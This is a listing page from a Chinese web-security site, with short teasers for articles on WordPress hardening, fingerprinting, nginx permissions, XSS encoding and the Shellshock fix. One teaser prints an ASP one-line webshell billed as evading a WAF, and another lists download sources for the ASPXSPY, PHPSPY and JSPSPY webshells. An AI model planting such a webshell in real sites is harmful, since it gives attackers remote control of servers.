安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
逆向工程 ExploitS 系统文档 移动安全 硬件安全 无线安全WEB安全 DataBase 神兵利刃 网络安全 编程茶楼 WooYun
返回首页
当前位置: 安云网 > 技术关注 > WEB安全 >
  • [WEB安全] 如何为Wordpress做安全防护? 日期::2014-12-01点击:65 好评:0

    最近看了infosec 出品的Protecting WordPress Installations in an IaaS Environment》,决定给裸奔的wordpress做做安全加固。wordpress是国人搭建个人博客的首选,其地位等同于论坛搭建首选discuz(话说…...

  • [WEB安全] 如何使用WappalyzerAPI进行Web应用指纹识别 日期::2014-12-01点击:48 好评:0

    Web应用指纹识别,是web渗透信息收集最关键的一步,这方面开源的工具也非常多,像BlindElephant,whatweb以及在非安全圈都很火的wappalyzer。本文主要描述如何使用wappalyzer的perl与php接口进行指纹识别。W…...

  • [WEB安全] 剑走偏锋:细数Shell那些事 日期::2014-12-01点击:23 好评:0

    说到Shell,我想大家恐怕都不会太陌生。不仅如此,我想大家应该有不少自己的珍藏吧(有珍藏的可以私信我,咱们私聊:P)按平台分类的话,基本上大体可以分为两大类:针对web级别的和针对系统级别的。针对web的大体…...

  • [WEB安全] 过狗asp一句话 日期::2014-11-17点击:174 好评:0

    % dimx1,x2 x1=request(pass) x2=x1 evalx2 % !--yes++--...

  • [WEB安全] WebShell三剑客(ASPXSPY、PHPSPY、JSPSPY) 日期::2014-11-11点击:342 好评:0

    ASPSPY:http://www.rootkit.net.cn/article.asp?id=132已关闭 下载: ASPXspy2 JSPSPY:http://www.forjj.com/?action=showid=138 已关闭 下载: jspspy PHPSPY:http://www.4ngel.net/project/phpspy.htm 下载: phpspy...

  • [WEB安全] Nginx下多站点正确限制目录php执行权限 日期::2014-11-06点击:21 好评:0

    我一朋友是站长,他服务器里上传目录是这么配置的:[root@Centos62~]#chomd-R-xupload这可着实把我吓坏了,我说:“你平时都是这么干的吗?”朋友:“对啊!把x执行权限取消了,你放什么木…...

  • [WEB安全] 遇到一个有趣的逻辑漏洞 日期::2014-11-03点击:180 好评:0

    遇到个有趣的逻辑漏洞,和大家分享一下。 某系统数据库是mysql。user表有个code字段,类型是int(11),这个字段是保存一个随机数,用来找回密码的时候做验证,默认值是0。 找回密码时候的步骤是,首先填写自己邮箱,接收重置密...

  • [WEB安全] web安全浅析 日期::2014-10-29点击:92 好评:0

    就之前本人主持开发的金融产品所遇到的安全问题,设计部分请参见:http://www.cnblogs.com/shenliang123/p/3835072.html 这里就部分web安全防护就简单的交流: 1.1系统安全 1.1.1 客户端脚本安全 (1)跨站脚本攻击(XSS): XSS攻击,通常指黑...

  • [WEB安全] 最新Bash漏洞修补初级方案 日期::2014-10-09点击:8 好评:0

    ‍‍Bash爆出远程解析命令执行漏洞(CVE-2014-6271),波及各大Linux发行版与MacOSX系统。漏洞可以直接在Bash支持的Web CGI环境下远程执行任意命令。传送门‍bash注入公开之后根据官方的文档发现,攻击者只要保持$&n…...

  • [WEB安全] XSS编码剖析 日期::2014-09-22点击:13 好评:0

    000 引言‍‍‍‍‍‍很多不了解‍‍‍‍‍‍html‍‍‍‍、‍‍‍‍js编码的童鞋挖掘xss漏洞时,都是一顿乱插,姿势对了,就能获得快感,姿势不对,就么反应。另外在freebuf里,有很多文章介绍过跨站编码,有兴趣的,可以搜索...

推荐内容